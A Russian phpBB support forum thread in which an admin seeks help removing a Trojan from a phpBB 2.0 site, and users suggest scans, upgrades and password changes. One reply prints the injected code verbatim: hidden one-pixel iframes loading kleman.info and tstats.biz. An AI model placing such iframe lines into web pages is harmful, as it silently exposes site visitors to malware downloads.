Уважаемые пользователи!
Напоминаем, что с 7 ноября 2020 года phpBB Group прекращает поддержку phpBB версии 3.2.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2020 года.
С учетом этого, а также того, что версия 3.2.x больше не будет получать обновлений, за исключением связанных с проблемами безопасности
(только при их наличии и только до 7 ноября 2020 года), рекомендуется обновить конференции до версии 3.3.x.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 14 лет 8 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 16 лет 9 месяцев
Откуда: Бердск
Поблагодарили: 15 раз

Сообщение crash »

AdmninsCluba писал(а):Что надо сделать чтобы найти и убить скрипт?
антивирус.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 14 лет 8 месяцев
Благодарил (а): 1 раз

Сообщение AdmninsCluba »

антивирус.
Касперский стоит.

Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?
Аватара пользователя
Палыч
Former team member
Сообщения: 9683
Стаж: 14 лет 11 месяцев
Откуда: Питер
Благодарил (а): 3 раза
Поблагодарили: 454 раза

Сообщение Палыч »

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума.
Тогда пусть хостер и скажет, где эта дырка
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.
Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 15421
Стаж: 14 лет 11 месяцев
Откуда: Красноярск
Благодарил (а): 411 раз
Поблагодарили: 1840 раз

Сообщение rxu »

AdmninsCluba
А если не секрет, какая версия phpBB установлена?
Изображение
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 16 лет 9 месяцев
Откуда: Бердск
Поблагодарили: 15 раз

Сообщение crash »

AdmninsCluba
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 14 лет 8 месяцев
Благодарил (а): 1 раз

Сообщение AdmninsCluba »

А если не секрет, какая версия phpBB установлена?
Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

Но версия не поменялась в админ панели. Может надо обновить форум?
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Локалхоста нет. Резервную копию откатываю папками.

Касперский найдет проблему в папках на компьютере или нет? Обязательно нужен Денвер?
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 16 лет 9 месяцев
Откуда: Бердск
Поблагодарили: 15 раз

Сообщение crash »

AdmninsCluba писал(а):Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.
уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.
AdmninsCluba писал(а):Касперский найдет проблему в папках на компьютере или нет?
на вашем компьютере он найдет все что угодно.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 14 лет 8 месяцев
Благодарил (а): 1 раз

Сообщение AdmninsCluba »

crash писал(а):уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.
Почему я с трояном не смогу обновить версию форума?
Аватара пользователя
crash
Former team member
Сообщения: 6517
Стаж: 16 лет 9 месяцев
Откуда: Бердск
Поблагодарили: 15 раз

Сообщение crash »

AdmninsCluba писал(а):Почему я с трояном не смогу обновить версию форума?
AdmninsCluba писал(а):Почистил файл - index.php. Не помогло
можете, но так с ним и останетесь
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса
Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 917
Стаж: 15 лет 9 месяцев
Откуда: с Луны свалил...

Сообщение edgar »

Сейчас эпидемия. Троян приобретается от зараженных сайтов через браузер IE, ворует пароли FTP (и не только) и заражает новые сайты.
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. :) Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть
Аватара пользователя
go
phpBB 2.0.1
Сообщения: 261
Стаж: 15 лет 1 месяц

Сообщение go »

edgar писал(а):убить IE и ставить чистый и больше им не пользоваться.
зачем ставить если в последствии дается совет - более не пользоватся? :(
или сайтом не пользоваться?
Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 917
Стаж: 15 лет 9 месяцев
Откуда: с Луны свалил...

Сообщение edgar »

go писал(а):зачем ставить
А как же при переустановке винды его не поставить? :( Или у вас другая ос.

Я в общем нашел, что троян убивает только файл iexplore.exe. Выявляется это и лечится утилитой HaxFix 4.41
У меня ссылка есть, но я ее не дам, так как это haxfix.exe. Подумаете еще плохое что-нибудь... :) Но найти не сложно.
После запуска надо выбрать 2. Run auto fix
Ну и потом, естественно все пароли сменить - фтп, аськи и т.д.
Xpert
phpBB Guru
phpBB Guru
Сообщения: 5484
Стаж: 17 лет 1 месяц
Поблагодарили: 2 раза

Сообщение Xpert »

Некоторые технические подробности, поскольку недавно один клиент подцепил подобного трояна...

Внедряется в
admin/index.php
login.php
index.php
includes/auth.php


Добавляет такой код:

Код: Выделить всё

<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
Или такой

Код: Выделить всё

<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Или оба вместе

Еще его вставляют в файлы index.html в папках.

После того как был сменен пароль на FTP, проблемы исчезли.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений
Аватара пользователя
amelanin
phpBB 1.2.1
Сообщения: 20
Стаж: 14 лет 8 месяцев
Откуда: Санкт-Петербург

Сообщение amelanin »

У меня такое было - подробности кидал тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0

обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.

Вернуться в «phpBB-пространство»